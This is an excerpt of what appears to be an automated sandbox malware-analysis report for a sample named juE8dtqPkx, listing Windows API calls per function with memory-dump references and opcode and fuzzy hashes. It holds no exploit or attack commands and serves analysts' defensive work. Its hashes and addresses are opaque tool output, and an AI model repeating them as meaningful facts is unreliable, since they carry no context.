                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00464B28
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                    • _wcslen.LIBCMT ref: 00464C28
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                    • String ID: D
                                                    • API String ID: 1914653954-2746444292
                                                    • Opcode ID: ed9d0a7f9b7fb7092718205c5f8494621a67a2dc2e8c2e1649d5905c8fe18f22
                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                    • Opcode Fuzzy Hash: ed9d0a7f9b7fb7092718205c5f8494621a67a2dc2e8c2e1649d5905c8fe18f22
                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 0045CE39
                                                    • __wsplitpath.LIBCMT ref: 0045CE78
                                                    • _wcscat.LIBCMT ref: 0045CE8B
                                                    • _wcscat.LIBCMT ref: 0045CE9E
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                    • _wcscpy.LIBCMT ref: 0045CF61
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                    • String ID: *.*
                                                    • API String ID: 1153243558-438819550
                                                    • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                    • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                    • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                    • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll
                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                    • API String ID: 3832890014-4202584635
                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                    APIs
                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                    • GetFocus.USER32 ref: 0046A0DD
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$CtrlFocus
                                                    • String ID: 0
                                                    • API String ID: 1534620443-4108050209
                                                    • Opcode ID: 7c6c4d24ceb8cecb3d8bafd3d66fcf6c17dfe0bcf56ceba48e1820ad1c1361f1
                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                    • Opcode Fuzzy Hash: 7c6c4d24ceb8cecb3d8bafd3d66fcf6c17dfe0bcf56ceba48e1820ad1c1361f1
                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateDestroy
                                                    • String ID: ,$tooltips_class32
                                                    • API String ID: 1109047481-3856767331
                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID: 0
                                                    • API String ID: 1441871840-4108050209
                                                    • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                    • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 3631882475-2268648507
                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                    • SendMessageW.USER32 ref: 00471740
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                    • SendMessageW.USER32 ref: 0047184F
                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 4116747274-0
                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                    • _wcslen.LIBCMT ref: 00461683
                                                    • __swprintf.LIBCMT ref: 00461721
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                    • GetParent.USER32(?), ref: 004618C3
                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                    • String ID: %s%u
                                                    • API String ID: 1899580136-679674701
                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu$Sleep
                                                    • String ID: 0
                                                    • API String ID: 1196289194-4108050209
                                                    • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                    • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                    • String ID: (
                                                    • API String ID: 3300687185-3887548279
                                                    • Opcode ID: cfc1d8c6a0823e7a49ed36632b2cd954b4a10292cfc1fb15d36a0f99b3ff0906
                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                    • Opcode Fuzzy Hash: cfc1d8c6a0823e7a49ed36632b2cd954b4a10292cfc1fb15d36a0f99b3ff0906
                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    Strings
                                                    Memory Dump Source
